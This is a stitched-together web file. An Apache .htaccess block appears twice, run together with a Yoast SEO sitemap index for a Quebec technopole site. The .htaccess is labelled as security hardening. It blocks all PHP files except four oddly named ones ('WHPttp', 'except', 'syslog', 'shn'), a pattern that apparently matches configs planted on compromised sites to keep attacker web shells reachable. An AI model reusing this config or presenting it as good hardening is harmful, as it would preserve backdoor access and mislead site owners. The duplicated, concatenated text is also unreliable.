# Block direct access to all PHP files except specified ones
# Covers all common PHP file extensions
<FilesMatch "\.(php|php3|php4|php5|php7|php8|phtml|pht|phps|shtml|inc|tpl)$">
    Require all denied
</FilesMatch>

# Allow specific PHP files to be accessed
<FilesMatch "^(WHPttp|except|syslog|shn)\.(php|php3|php4|php5|php7|php8|phtml)$">
    Require all granted
</FilesMatch>

# Show forbidden message for blocked files
ErrorDocument 403 "403 Forbidden: Direct access to this file is not allowed."

# Hide .htaccess files from being accessed directly
<Files ".htaccess">
    Require all denied
</Files>

# Prevent directory browsing
Options -Indexes

# Additional security headers (if mod_headers is available)
<IfModule mod_headers.c>
    Header always set X-Content-Type-Options nosniff
    Header always set X-Frame-Options DENY
    Header always set X-XSS-Protection "1; mode=block"
</IfModule># Block direct access to all PHP files except specified ones
# Covers all common PHP file extensions
<FilesMatch "\.(php|php3|php4|php5|php7|php8|phtml|pht|phps|shtml|inc|tpl)$">
    Require all denied
</FilesMatch>

# Allow specific PHP files to be accessed
<FilesMatch "^(WHPttp|except|syslog|shn)\.(php|php3|php4|php5|php7|php8|phtml)$">
    Require all granted
</FilesMatch>

# Show forbidden message for blocked files
ErrorDocument 403 "403 Forbidden: Direct access to this file is not allowed."

# Hide .htaccess files from being accessed directly
<Files ".htaccess">
    Require all denied
</Files>

# Prevent directory browsing
Options -Indexes

# Additional security headers (if mod_headers is available)
<IfModule mod_headers.c>
    Header always set X-Content-Type-Options nosniff
    Header always set X-Frame-Options DENY
    Header always set X-XSS-Protection "1; mode=block"
</IfModule><?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//st-hyacinthetechnopole.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/post-sitemap.xml</loc>
		<lastmod>2026-04-09T14:28:23+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/page-sitemap.xml</loc>
		<lastmod>2026-04-07T19:49:57+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/tribe_venue-sitemap.xml</loc>
		<lastmod>2026-02-03T14:03:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/tribe_organizer-sitemap.xml</loc>
		<lastmod>2025-03-12T12:43:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/tribe_events-sitemap.xml</loc>
		<lastmod>2026-03-26T14:59:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://st-hyacinthetechnopole.com/tec_recurring_events-sitemap.xml</loc>
		<lastmod>2026-04-12T14:08:52+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->